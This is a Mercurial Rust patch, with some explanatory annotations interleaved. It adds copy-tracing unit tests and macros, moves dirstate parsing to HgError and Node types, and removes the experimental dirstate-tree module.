- // We preserve the new
- // information about the new file.
- MergePick::Minor
+ // by default the major side wins
+ (MergePick::Major, true)
}
}
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/copy_tracing/tests.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,141 @@
+use super::*;
+
+/// Unit tests for:
+///
+/// ```ignore
+/// fn compare_value(
+/// current_merge: Revision,
+/// merge_case_for_dest: impl Fn() -> MergeCase,
+/// src_minor: &CopySource,
+/// src_major: &CopySource,
+/// ) -> (MergePick, /* overwrite: */ bool)
+/// ```
+#[test]
+fn test_compare_value() {
+ // The `compare_value!` macro calls the `compare_value` function with
+ // arguments given in pseudo-syntax:
+ //
+ // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead
+ // of a closure.
+ // * `CopySource` values are represented as `(rev, path, overwritten)`
+ // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`.
+ // * `PathToken` is an integer not read by `compare_value`. It only checks
+ // for `Some(_)` indicating a file copy vs. `None` for a file deletion.
+ // * `OrdSet<Revision>` is represented as a Python-like set literal.
+
+ use MergeCase::*;
+ use MergePick::*;
+
+ assert_eq!(
+ compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })),
+ (Any, false)
+ );
+}
+
+/// Unit tests for:
+///
+/// ```ignore
+/// fn merge_copies_dict(
+/// path_map: &TwoWayPathMap, // Not visible in test cases
+/// current_merge: Revision,
+/// minor: InternalPathCopies,
+/// major: InternalPathCopies,
+/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+/// ) -> InternalPathCopies
+/// ```
+#[test]
+fn test_merge_copies_dict() {
+ // The `merge_copies_dict!` macro calls the `merge_copies_dict` function
+ // with arguments given in pseudo-syntax:
+ //
+ // * `TwoWayPathMap` and path tokenization are implicitly taken care of.
+ // All paths are given as string literals.
+ // * Key-value maps are represented with `{key1 => value1, key2 => value2}`
+ // pseudo-syntax.
+ // * `InternalPathCopies` is a map of copy destination path keys to
+ // `CopySource` values.
+ // - `CopySource` is represented as a `(rev, source_path, overwritten)`
+ // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`.
+ // - Unlike in `test_compare_value`, source paths are string literals.
+ // - `OrdSet<Revision>` is again represented as a Python-like set
+ // literal.
+ // * `get_merge_case` is represented as a map of copy destination path to
+ // `MergeCase`. The default for paths not in the map is
+ // `MergeCase::Normal`.
+ //
+ // `internal_path_copies!` creates an `InternalPathCopies` value with the
+ // same pseudo-syntax as in `merge_copies_dict!`.
+
+ use MergeCase::*;
+
+ assert_eq!(
+ merge_copies_dict!(
+ 1,
+ {"foo" => (1, None, {})},
+ {},
+ {"foo" => Merged}
+ ),
+ internal_path_copies!("foo" => (1, None, {}))
+ );
+}
+
+/// Unit tests for:
+///
+/// ```ignore
+/// impl CombineChangesetCopies {
+/// fn new(children_count: HashMap<Revision, usize>) -> Self
+///
+/// // Called repeatedly:
+/// fn add_revision_inner<'a>(
+/// &mut self,
+/// rev: Revision,
+/// p1: Revision,
+/// p2: Revision,
+/// copy_actions: impl Iterator<Item = Action<'a>>,
+/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+/// )
+///
+/// fn finish(mut self, target_rev: Revision) -> PathCopies
+/// }
+/// ```
+#[test]
+fn test_combine_changeset_copies() {
+ // `combine_changeset_copies!` creates a `CombineChangesetCopies` with
+ // `new`, then calls `add_revision_inner` repeatedly, then calls `finish`
+ // for its return value.
+ //
+ // All paths are given as string literals.
+ //
+ // * Key-value maps are represented with `{key1 => value1, key2 => value2}`
+ // pseudo-syntax.
+ // * `children_count` is a map of revision numbers to count of children in
+ // the DAG. It includes all revisions that should be considered by the
+ // algorithm.
+ // * Calls to `add_revision_inner` are represented as an array of anonymous
+ // structs with named fields, one pseudo-struct per call.
+ //
+ // `path_copies!` creates a `PathCopies` value, a map of copy destination
+ // keys to copy source values. Note: the arrows for map literal syntax
+ // point **backwards** compared to the logical direction of copy!
+
+ use crate::NULL_REVISION as NULL;
+ use Action::*;
+ use MergeCase::*;
+
+ assert_eq!(
+ combine_changeset_copies!(
+ { 1 => 1, 2 => 1 },
+ [
+ { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, },
+ { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, },
+ {
+ rev: 3, p1: 1, p2: 2,
+ actions: [CopiedFromP1("destination.txt", "source.txt")],
+ merge_cases: {"destination.txt" => Merged},
+ },
+ ],
+ 3,
+ ),
+ path_copies!("destination.txt" => "source.txt")
+ );
+}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/copy_tracing/tests_support.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,199 @@
+//! Supporting macros for `tests.rs` in the same directory.
+//! See comments there for usage.
+
+/// Python-like set literal
+macro_rules! set {
+ (
+ $Type: ty {
+ $( $value: expr ),* $(,)?
+ }
+ ) => {{
+ #[allow(unused_mut)]
+ let mut set = <$Type>::new();
+ $( set.insert($value); )*
+ set
+ }}
+}
+
+/// `{key => value}` map literal
+macro_rules! map {
+ (
+ $Type: ty {
+ $( $key: expr => $value: expr ),* $(,)?
+ }
+ ) => {{
+ #[allow(unused_mut)]
+ let mut map = <$Type>::new();
+ $( map.insert($key, $value); )*
+ map
+ }}
+}
+
+macro_rules! copy_source {
+ ($rev: expr, $path: expr, $overwritten: tt) => {
+ CopySource {
+ rev: $rev,
+ path: $path,
+ overwritten: set!(OrdSet<Revision> $overwritten),
+ }
+ };
+}
+
+macro_rules! compare_value {
+ (
+ $merge_revision: expr,
+ $merge_case_for_dest: ident,
+ ($min_rev: expr, $min_path: expr, $min_overwrite: tt),
+ ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)?
+ ) => {
+ compare_value(
+ $merge_revision,
+ || $merge_case_for_dest,
+ &copy_source!($min_rev, $min_path, $min_overwrite),
+ &copy_source!($maj_rev, $maj_path, $maj_overwrite),
+ )
+ };
+}
+
+macro_rules! tokenized_path_copies {
+ (
+ $path_map: ident, {$(
+ $dest: expr => (
+ $src_rev: expr,
+ $src_path: expr,
+ $src_overwrite: tt
+ )
+ ),*}
+ $(,)*
+ ) => {
+ map!(InternalPathCopies {$(
+ $path_map.tokenize(HgPath::new($dest)) =>
+ copy_source!(
+ $src_rev,
+ Option::map($src_path, |p: &str| {
+ $path_map.tokenize(HgPath::new(p))
+ }),
+ $src_overwrite
+ )
+ )*})
+ }
+}
+
+macro_rules! merge_case_callback {
+ (
+ $( $merge_path: expr => $merge_case: ident ),*
+ $(,)?
+ ) => {
+ #[allow(unused)]
+ |merge_path| -> MergeCase {
+ $(
+ if (merge_path == HgPath::new($merge_path)) {
+ return $merge_case
+ }
+ )*
+ MergeCase::Normal
+ }
+ };
+}
+
+macro_rules! merge_copies_dict {
+ (
+ $current_merge: expr,
+ $minor_copies: tt,
+ $major_copies: tt,
+ $get_merge_case: tt $(,)?
+ ) => {
+ {
+ #[allow(unused_mut)]
+ let mut map = TwoWayPathMap::default();
+ let minor = tokenized_path_copies!(map, $minor_copies);
+ let major = tokenized_path_copies!(map, $major_copies);
+ merge_copies_dict(
+ &map, $current_merge, minor, major,
+ merge_case_callback! $get_merge_case,
+ )
+ .into_iter()
+ .map(|(token, source)| {
+ (
+ map.untokenize(token).to_string(),
+ (
+ source.rev,
+ source.path.map(|t| map.untokenize(t).to_string()),
+ source.overwritten.into_iter().collect(),
+ ),
+ )
+ })
+ .collect::<OrdMap<_, _>>()
+ }
+ };
+}
+
+macro_rules! internal_path_copies {
+ (
+ $(
+ $dest: expr => (
+ $src_rev: expr,
+ $src_path: expr,
+ $src_overwrite: tt $(,)?
+ )
+ ),*
+ $(,)*
+ ) => {
+ map!(OrdMap<_, _> {$(
+ String::from($dest) => (
+ $src_rev,
+ $src_path,
+ set!(OrdSet<Revision> $src_overwrite)
+ )
+ ),*})
+ };
+}
+
+macro_rules! combine_changeset_copies {
+ (
+ $children_count: tt,
+ [
+ $(
+ {
+ rev: $rev: expr,
+ p1: $p1: expr,
+ p2: $p2: expr,
+ actions: [
+ $(
+ $Action: ident($( $action_path: expr ),+)
+ ),*
+ $(,)?
+ ],
+ merge_cases: $merge: tt
+ $(,)?
+ }
+ ),*
+ $(,)?
+ ],
+ $target_rev: expr $(,)*
+ ) => {{
+ let count = map!(HashMap<Revision, usize> $children_count);
+ let mut combine_changeset_copies = CombineChangesetCopies::new(count);
+ $(
+ let actions = vec![$(
+ $Action($( HgPath::new($action_path) ),*)
+ ),*];
+ combine_changeset_copies.add_revision_inner(
+ $rev, $p1, $p2, actions.into_iter(),
+ merge_case_callback! $merge
+ );
+ )*
+ combine_changeset_copies.finish($target_rev)
+ }};
+}
+
+macro_rules! path_copies {
+ (
+ $( $expected_destination: expr => $expected_source: expr ),* $(,)?
+ ) => {
+ map!(PathCopies {$(
+ HgPath::new($expected_destination).to_owned()
+ => HgPath::new($expected_source).to_owned(),
+ ),*})
+ };
+}
--- a/rust/hg-core/src/dirstate.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,21 +5,23 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap};
+use crate::errors::HgError;
+use crate::revlog::Node;
+use crate::{utils::hg_path::HgPathBuf, FastHashMap};
+use bytes_cast::{unaligned, BytesCast};
use std::collections::hash_map;
use std::convert::TryFrom;
pub mod dirs_multiset;
pub mod dirstate_map;
-#[cfg(feature = "dirstate-tree")]
-pub mod dirstate_tree;
pub mod parsers;
pub mod status;
-#[derive(Debug, PartialEq, Clone)]
+#[derive(Debug, PartialEq, Clone, BytesCast)]
+#[repr(C)]
pub struct DirstateParents {
- pub p1: [u8; 20],
- pub p2: [u8; 20],
+ pub p1: Node,
+ pub p2: Node,
}
/// The C implementation uses all signed types. This will be an issue
@@ -33,20 +35,24 @@
pub size: i32,
}
+#[derive(BytesCast)]
+#[repr(C)]
+struct RawEntry {
+ state: u8,
+ mode: unaligned::I32Be,
+ size: unaligned::I32Be,
+ mtime: unaligned::I32Be,
+ length: unaligned::I32Be,
+}
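// An illustrative sketch (not part of the patch) of one on-disk entry as
// read through `RawEntry`: a state byte, four big-endian i32 fields, then
// `length` bytes of path data following the fixed-size part:
//
//     let mut entry = vec![b'n'];                        // state: normal
//     entry.extend_from_slice(&0o644i32.to_be_bytes());  // mode
//     entry.extend_from_slice(&12i32.to_be_bytes());     // size
//     entry.extend_from_slice(&0i32.to_be_bytes());      // mtime
//     entry.extend_from_slice(&7i32.to_be_bytes());      // length of b"foo.txt"
//     entry.extend_from_slice(b"foo.txt");
//     let (raw, rest) = RawEntry::from_bytes(&entry).unwrap();
//     assert_eq!(raw.state, b'n');
//     assert_eq!(raw.length.get(), 7);
//     assert_eq!(rest, b"foo.txt");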
+
/// A `DirstateEntry` with a size of `-2` means that it was merged from the
/// other parent. This allows revert to pick the right status back during a
/// merge.
pub const SIZE_FROM_OTHER_PARENT: i32 = -2;
-#[cfg(not(feature = "dirstate-tree"))]
pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>;
-#[cfg(not(feature = "dirstate-tree"))]
pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>;
-#[cfg(feature = "dirstate-tree")]
-pub type StateMap = dirstate_tree::tree::Tree;
-#[cfg(feature = "dirstate-tree")]
-pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>;
pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>;
pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>;
@@ -60,7 +66,7 @@
}
impl TryFrom<u8> for EntryState {
- type Error = DirstateParseError;
+ type Error = HgError;
fn try_from(value: u8) -> Result<Self, Self::Error> {
match value {
@@ -69,8 +75,8 @@
b'r' => Ok(EntryState::Removed),
b'm' => Ok(EntryState::Merged),
b'?' => Ok(EntryState::Unknown),
- _ => Err(DirstateParseError::CorruptedEntry(format!(
- "Incorrect entry state {}",
+ _ => Err(HgError::CorruptedRepository(format!(
+ "Incorrect dirstate entry state {}",
value
))),
}
--- a/rust/hg-core/src/dirstate/dirs_multiset.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/dirs_multiset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -30,7 +30,6 @@
/// Initializes the multiset from a dirstate.
///
/// If `skip_state` is provided, skips dirstate entries with equal state.
- #[cfg(not(feature = "dirstate-tree"))]
pub fn from_dirstate(
dirstate: &StateMap,
skip_state: Option<EntryState>,
@@ -51,30 +50,6 @@
Ok(multiset)
}
- /// Initializes the multiset from a dirstate.
- ///
- /// If `skip_state` is provided, skips dirstate entries with equal state.
- #[cfg(feature = "dirstate-tree")]
- pub fn from_dirstate(
- dirstate: &StateMap,
- skip_state: Option<EntryState>,
- ) -> Result<Self, DirstateMapError> {
- let mut multiset = DirsMultiset {
- inner: FastHashMap::default(),
- };
- for (filename, DirstateEntry { state, .. }) in dirstate.iter() {
- // This `if` is optimized out of the loop
- if let Some(skip) = skip_state {
- if skip != state {
- multiset.add_path(filename)?;
- }
- } else {
- multiset.add_path(filename)?;
- }
- }
-
- Ok(multiset)
- }
/// Initializes the multiset from a manifest.
pub fn from_manifest(
--- a/rust/hg-core/src/dirstate/dirstate_map.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/dirstate_map.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,8 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::revlog::node::NULL_NODE_ID;
+use crate::errors::HgError;
+use crate::revlog::node::NULL_NODE;
use crate::{
dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT},
pack_dirstate, parse_dirstate,
@@ -14,7 +15,7 @@
hg_path::{HgPath, HgPathBuf},
},
CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError,
- DirstateParents, DirstateParseError, FastHashMap, StateMap,
+ DirstateParents, FastHashMap, StateMap,
};
use micro_timer::timed;
use std::collections::HashSet;
@@ -72,8 +73,8 @@
self.non_normal_set = None;
self.other_parent_set = None;
self.set_parents(&DirstateParents {
- p1: NULL_NODE_ID,
- p2: NULL_NODE_ID,
+ p1: NULL_NODE,
+ p2: NULL_NODE,
})
}
@@ -253,7 +254,6 @@
)
}
- #[cfg(not(feature = "dirstate-tree"))]
pub fn set_non_normal_other_parent_entries(&mut self, force: bool) {
if !force
&& self.non_normal_set.is_some()
@@ -282,34 +282,6 @@
self.non_normal_set = Some(non_normal);
self.other_parent_set = Some(other_parent);
}
- #[cfg(feature = "dirstate-tree")]
- pub fn set_non_normal_other_parent_entries(&mut self, force: bool) {
- if !force
- && self.non_normal_set.is_some()
- && self.other_parent_set.is_some()
- {
- return;
- }
- let mut non_normal = HashSet::new();
- let mut other_parent = HashSet::new();
-
- for (
- filename,
- DirstateEntry {
- state, size, mtime, ..
- },
- ) in self.state_map.iter()
- {
- if state != EntryState::Normal || mtime == MTIME_UNSET {
- non_normal.insert(filename.to_owned());
- }
- if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT {
- other_parent.insert(filename.to_owned());
- }
- }
- self.non_normal_set = Some(non_normal);
- self.other_parent_set = Some(other_parent);
- }
/// Both of these setters and their uses appear to be the simplest way to
/// emulate a Python lazy property, but it is ugly and unidiomatic.
@@ -366,11 +338,13 @@
};
} else if file_contents.is_empty() {
parents = DirstateParents {
- p1: NULL_NODE_ID,
- p2: NULL_NODE_ID,
+ p1: NULL_NODE,
+ p2: NULL_NODE,
};
} else {
- return Err(DirstateError::Parse(DirstateParseError::Damaged));
+ return Err(
+ HgError::corrupted("Dirstate appears to be damaged").into()
+ );
}
self.parents = Some(parents);
@@ -383,10 +357,10 @@
}
#[timed]
- pub fn read(
+ pub fn read<'a>(
&mut self,
- file_contents: &[u8],
- ) -> Result<Option<DirstateParents>, DirstateError> {
+ file_contents: &'a [u8],
+ ) -> Result<Option<&'a DirstateParents>, DirstateError> {
if file_contents.is_empty() {
return Ok(None);
}
@@ -423,7 +397,6 @@
self.set_non_normal_other_parent_entries(true);
Ok(packed)
}
- #[cfg(not(feature = "dirstate-tree"))]
pub fn build_file_fold_map(&mut self) -> &FileFoldMap {
if let Some(ref file_fold_map) = self.file_fold_map {
return file_fold_map;
@@ -439,22 +412,6 @@
self.file_fold_map = Some(new_file_fold_map);
self.file_fold_map.as_ref().unwrap()
}
- #[cfg(feature = "dirstate-tree")]
- pub fn build_file_fold_map(&mut self) -> &FileFoldMap {
- if let Some(ref file_fold_map) = self.file_fold_map {
- return file_fold_map;
- }
- let mut new_file_fold_map = FileFoldMap::default();
-
- for (filename, DirstateEntry { state, .. }) in self.state_map.iter() {
- if state != EntryState::Removed {
- new_file_fold_map
- .insert(normalize_case(&filename), filename.to_owned());
- }
- }
- self.file_fold_map = Some(new_file_fold_map);
- self.file_fold_map.as_ref().unwrap()
- }
}
#[cfg(test)]
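
The `read<'a>` signature change above threads the lifetime of `file_contents` through to the returned `DirstateParents`, so callers borrow the parents straight out of the (possibly mmap-backed) buffer instead of copying 40 bytes. A standalone sketch of the same borrowing pattern, with plain byte slices standing in for the real types:

```rust
// Sketch only: `Parents` here is illustrative, not the hg-core type.
const PARENT_SIZE: usize = 20; // nodes are 20-byte hashes

struct Parents<'a> {
    p1: &'a [u8],
    p2: &'a [u8],
}

// The returned references are tied to `file_contents`; the borrow checker
// guarantees the buffer outlives any use of the parents.
fn read_parents(file_contents: &[u8]) -> Option<Parents<'_>> {
    if file_contents.len() < PARENT_SIZE * 2 {
        return None;
    }
    Some(Parents {
        p1: &file_contents[..PARENT_SIZE],
        p2: &file_contents[PARENT_SIZE..PARENT_SIZE * 2],
    })
}
```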
--- a/rust/hg-core/src/dirstate/dirstate_tree.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-// dirstate_tree.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-//! Special-case radix tree that matches a filesystem hierarchy for use in the
-//! dirstate.
-//! It has not been optimized at all yet.
-
-pub mod iter;
-pub mod node;
-pub mod tree;
--- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,392 +0,0 @@
-// iter.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::node::{Node, NodeKind};
-use super::tree::Tree;
-use crate::dirstate::dirstate_tree::node::Directory;
-use crate::dirstate::status::Dispatch;
-use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf};
-use crate::DirstateEntry;
-use std::borrow::Cow;
-use std::collections::VecDeque;
-use std::iter::{FromIterator, FusedIterator};
-use std::path::PathBuf;
-
-impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree {
- fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>(
- iter: T,
- ) -> Self {
- let mut tree = Self::new();
- for (path, entry) in iter {
- tree.insert(path, entry);
- }
- tree
- }
-}
-
-/// Iterator of all entries in the dirstate tree.
-///
-/// It has no particular ordering.
-pub struct Iter<'a> {
- to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>,
-}
-
-impl<'a> Iter<'a> {
- pub fn new(node: &'a Node) -> Iter<'a> {
- let mut to_visit = VecDeque::new();
- to_visit.push_back((Cow::Borrowed(&b""[..]), node));
- Self { to_visit }
- }
-}
-
-impl<'a> Iterator for Iter<'a> {
- type Item = (HgPathBuf, DirstateEntry);
-
- fn next(&mut self) -> Option<Self::Item> {
- while let Some((base_path, node)) = self.to_visit.pop_front() {
- match &node.kind {
- NodeKind::Directory(dir) => {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- if let Some(file) = &dir.was_file {
- return Some((
- HgPathBuf::from_bytes(&base_path),
- file.entry,
- ));
- }
- }
- NodeKind::File(file) => {
- if let Some(dir) = &file.was_directory {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- }
- return Some((
- HgPathBuf::from_bytes(&base_path),
- file.entry,
- ));
- }
- }
- }
- None
- }
-}
-
-impl<'a> FusedIterator for Iter<'a> {}
-
-/// Iterator of all entries in the dirstate tree, with a special filesystem
-/// handling for the directories containing said entries.
-///
-/// It checks every directory on-disk to see if it has become a symlink, to
-/// prevent a potential security issue.
-/// Using this information, it may dispatch `status` information early: it
-/// returns canonical paths along with `Shortcut`s, which are either a
-/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been
-/// determined.
-///
-/// Like `Iter`, it has no particular ordering.
-pub struct FsIter<'a> {
- root_dir: PathBuf,
- to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>,
- shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>,
-}
-
-impl<'a> FsIter<'a> {
- pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> {
- let mut to_visit = VecDeque::new();
- to_visit.push_back((Cow::Borrowed(&b""[..]), node));
- Self {
- root_dir,
- to_visit,
- shortcuts: Default::default(),
- }
- }
-
- /// Mercurial tracks symlinks but *not* what they point to.
- /// If a directory is moved and symlinked:
- ///
- /// ```bash
- /// $ mkdir foo
- /// $ touch foo/a
- /// $ # commit...
- /// $ mv foo bar
- /// $ ln -s bar foo
- /// ```
- /// We need to dispatch the new symlink as `Unknown` and all the
- /// descendants of the directory it replaces as `Deleted`.
- fn dispatch_symlinked_directory(
- &mut self,
- path: impl AsRef<HgPath>,
- node: &Node,
- ) {
- let path = path.as_ref();
- self.shortcuts.push_back((
- path.to_owned(),
- StatusShortcut::Dispatch(Dispatch::Unknown),
- ));
- for (file, _) in node.iter() {
- self.shortcuts.push_back((
- path.join(&file),
- StatusShortcut::Dispatch(Dispatch::Deleted),
- ));
- }
- }
-
- /// Returns `true` if the canonical `path` of a directory corresponds to a
- /// symlink on disk. It means it was moved and symlinked after the last
- /// dirstate update.
- ///
- /// # Special cases
- ///
- /// Returns `false` for the repository root.
- /// Returns `false` on I/O error; error handling is outside of the iterator.
- fn directory_became_symlink(&mut self, path: &HgPath) -> bool {
- if path.is_empty() {
- return false;
- }
- let filename_as_path = match hg_path_to_path_buf(&path) {
- Ok(p) => p,
- _ => return false,
- };
- let meta = self.root_dir.join(filename_as_path).symlink_metadata();
- match meta {
- Ok(ref m) if m.file_type().is_symlink() => true,
- _ => false,
- }
- }
-}
-
-/// Returned by `FsIter`, since the `Dispatch` of any given entry may already
-/// be determined during the iteration. This is necessary for performance
-/// reasons, since hierarchical information is needed to `Dispatch` an entire
-/// subtree efficiently.
-#[derive(Debug, Copy, Clone)]
-pub enum StatusShortcut {
- /// An entry in the dirstate for further inspection
- Entry(DirstateEntry),
- /// The result of the status of the corresponding file
- Dispatch(Dispatch),
-}
-
-impl<'a> Iterator for FsIter<'a> {
- type Item = (HgPathBuf, StatusShortcut);
-
- fn next(&mut self) -> Option<Self::Item> {
- // If any paths have already been `Dispatch`-ed, return them
- if let Some(res) = self.shortcuts.pop_front() {
- return Some(res);
- }
-
- while let Some((base_path, node)) = self.to_visit.pop_front() {
- match &node.kind {
- NodeKind::Directory(dir) => {
- let canonical_path = HgPath::new(&base_path);
- if self.directory_became_symlink(canonical_path) {
- // Potential security issue, don't do a normal
- // traversal, force the results.
- self.dispatch_symlinked_directory(
- canonical_path,
- &node,
- );
- continue;
- }
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- if let Some(file) = &dir.was_file {
- return Some((
- HgPathBuf::from_bytes(&base_path),
- StatusShortcut::Entry(file.entry),
- ));
- }
- }
- NodeKind::File(file) => {
- if let Some(dir) = &file.was_directory {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- }
- return Some((
- HgPathBuf::from_bytes(&base_path),
- StatusShortcut::Entry(file.entry),
- ));
- }
- }
- }
-
- None
- }
-}
-
-impl<'a> FusedIterator for FsIter<'a> {}
-
-fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> {
- if path.is_empty() {
- other.into()
- } else {
- [path, &b"/"[..], other].concat().into()
- }
-}
-
-/// Adds all children of a given directory `dir` to the visit queue `to_visit`
-/// prefixed by a `base_path`.
-fn add_children_to_visit<'a>(
- to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>,
- base_path: &[u8],
- dir: &'a Directory,
-) {
- to_visit.extend(dir.children.iter().map(|(path, child)| {
- let full_path = join_path(&base_path, &path);
- (full_path, child)
- }));
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use crate::utils::hg_path::HgPath;
- use crate::{EntryState, FastHashMap};
- use std::collections::HashSet;
-
- #[test]
- fn test_iteration() {
- let mut tree = Tree::new();
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bar"),
- DirstateEntry {
- state: EntryState::Merged,
- mode: 41,
- mtime: 42,
- size: 43,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo2"),
- DirstateEntry {
- state: EntryState::Merged,
- mode: 40,
- mtime: 41,
- size: 42,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/baz"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bap/nested"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- assert_eq!(tree.len(), 4);
-
- let results: HashSet<_> =
- tree.iter().map(|(c, _)| c.to_owned()).collect();
- dbg!(&results);
- assert!(results.contains(HgPath::new(b"foo2")));
- assert!(results.contains(HgPath::new(b"foo/bar")));
- assert!(results.contains(HgPath::new(b"foo/baz")));
- assert!(results.contains(HgPath::new(b"foo/bap/nested")));
-
- let mut iter = tree.iter();
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert_eq!(None, iter.next());
- assert_eq!(None, iter.next());
- drop(iter);
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bap/nested/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- let results: FastHashMap<_, _> = tree.iter().collect();
- assert!(results.contains_key(HgPath::new(b"foo2")));
- assert!(results.contains_key(HgPath::new(b"foo/bar")));
- assert!(results.contains_key(HgPath::new(b"foo/baz")));
- // Is a dir but `was_file`, so it's listed as a removed file
- assert!(results.contains_key(HgPath::new(b"foo/bap/nested")));
- assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a")));
-
- // insert removed file (now directory) after nested file
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"a/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- // `insert` returns `None` for a directory
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"a"),
- DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- let results: FastHashMap<_, _> = tree.iter().collect();
- assert!(results.contains_key(HgPath::new(b"a")));
- assert!(results.contains_key(HgPath::new(b"a/a")));
- }
-}
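
For reference, the symlink audit the removed `FsIter` performed (see `directory_became_symlink` above) boils down to a `std::fs` `symlink_metadata` call, which inspects the link itself rather than following it. A minimal sketch under that assumption, with arbitrary `root`/`rel` parameters:

```rust
use std::path::Path;

// Sketch of the check the removed iterator used; any I/O error is treated
// as "not a symlink", since error handling lived outside the iterator.
fn directory_became_symlink(root: &Path, rel: &Path) -> bool {
    match root.join(rel).symlink_metadata() {
        Ok(meta) => meta.file_type().is_symlink(),
        Err(_) => false,
    }
}
```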
--- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,398 +0,0 @@
-// node.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::iter::Iter;
-use crate::utils::hg_path::HgPathBuf;
-use crate::{DirstateEntry, EntryState, FastHashMap};
-
-/// Represents a filesystem directory in the dirstate tree
-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Directory {
- /// Contains the old file information if it existed between changesets.
- /// Happens if a file `foo` is marked as removed, removed from the
- /// filesystem, then a directory `foo` is created and at least one of its
- /// descendants is added to Mercurial.
- pub(super) was_file: Option<Box<File>>,
- pub(super) children: FastHashMap<Vec<u8>, Node>,
-}
-
-/// Represents a filesystem file (or symlink) in the dirstate tree
-#[derive(Debug, Clone, PartialEq)]
-pub struct File {
- /// Contains the old structure if it existed between changesets.
- /// Happens when all descendants of `foo` are marked as removed and removed
- /// from the filesystem, then a file `foo` is created and added to Mercurial.
- pub(super) was_directory: Option<Box<Directory>>,
- pub(super) entry: DirstateEntry,
-}
-
-#[derive(Debug, Clone, PartialEq)]
-pub enum NodeKind {
- Directory(Directory),
- File(File),
-}
-
